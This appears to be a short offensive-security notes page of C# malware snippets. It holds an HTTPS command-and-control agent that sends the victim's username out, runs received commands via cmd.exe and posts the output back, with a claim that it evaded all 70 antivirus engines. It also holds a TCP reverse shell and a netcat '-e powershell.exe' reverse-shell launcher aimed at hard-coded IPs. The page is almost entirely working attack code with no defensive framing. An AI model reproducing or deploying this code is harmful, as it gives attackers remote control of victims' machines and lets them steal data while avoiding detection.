Malware
Very simple agent
A very simple program that is constantly requesting a C2 using HTTPs and sending the output of commands received via POST requests.
I send this malware on VirusTotal and I got 0 detection over 70 AVs.
using System.Text;
using System.Diagnostics;
namespace Program
{
class Program
{
private string url;
static void Main(string[] args)
{
Program prog = new Program("https://yxzimlegitxyz.free.beeceptor.com");
prog.MainLoop();
}
public Program (string url)
{
this.url = url;
}
public void MainLoop()
{
this.Fingerprinting();
while (true)
{
this.Sleep(GenerateRandomNumber(0, 5));
string command = this.SendGetRequest(this.url + "/cmd");
string result = this.ExecuteCmd(command);
this.SendPostRequest(this.url, result);
}
}
private void Fingerprinting()
{
string username = this.GetUsername();
this.SendPostRequest(this.url, username);
}
private int GenerateRandomNumber(int min, int max)
{
return new Random().Next(min, max);
}
private void Sleep(int seconds)
{
Thread.Sleep(seconds * 1000);
}
private string ExecuteCmd(string command)
{
var process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = $"/c {command}",
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardError = true,
CreateNoWindow = true
}
};
process.Start();
string stdout = process.StandardOutput.ReadToEnd();
string stderr = process.StandardError.ReadToEnd();
process.WaitForExit();
StringBuilder output = new StringBuilder();
output.Append(stdout);
output.Append(stderr);
return output.ToString();
}
private string GetUsername()
{
return Environment.UserName;
}
private string Base64Encode(string data)
{
return Convert.ToBase64String(Encoding.UTF8.GetBytes(data));
}
private string SendGetRequest(string url)
{
HttpClient client = new HttpClient();
HttpResponseMessage response = client.GetAsync(url).Result;
return response.Content.ReadAsStringAsync().Result;
}
public string SendPostRequest(string url, string body)
{
HttpClient client = new HttpClient();
StringContent content = new StringContent(
this.Base64Encode(body),
Encoding.UTF8, "text/plain"
);
HttpResponseMessage response = client.PostAsync(url, content).Result;
return response.Content.ReadAsStringAsync().Result;
}
}
}
TCP Reverse shell
Source www.revshells.com.
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("10.200.196.200", 15555))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
Shell commands
using System;
using System.Diagnostics;
namespace Example {
class Program {
static void Main() {
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo(
"c:\\Windows\\Temp\\nc.exe",
"-e powershell.exe 10.50.82.172 4444"
);
procInfo.CreateNoWindow = true;
proc.StartInfo = procInfo;
proc.Start();
}
}
}